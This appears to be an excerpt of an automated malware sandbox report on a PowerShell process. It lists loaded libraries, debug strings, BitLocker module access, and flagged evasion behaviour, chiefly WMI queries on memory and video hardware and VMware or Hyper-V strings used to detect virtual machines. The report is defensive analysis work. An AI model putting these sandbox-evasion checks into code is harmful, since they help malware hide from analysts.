Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb8 source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP; source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3AF4D2A5 pushad ; iretd 0_2_00007FFD3AF4D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B062300 pushad ; iretd 0_2_00007FFD3B06232D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B067933 push ebx; retf 0_2_00007FFD3B06794A

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries memory information (via WMI often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9924Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
Source: powershell.exe, 00000000.00000002.6054715501.000001A558115000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IsVirtualMachineMSFT_MpComputerStatusMSFT_MpComputerStatus
Source: powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: powershell.exe, 00000000.00000002.6052454796.000001A557CD9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: IsVirtualMachine
Source: powershell.exe, 00000000.00000002.6052454796.000001A557CD9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: booleanIsVirtualMachine
Source: powershell.exe, 00000000.00000002.6052454796.000001A557D4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
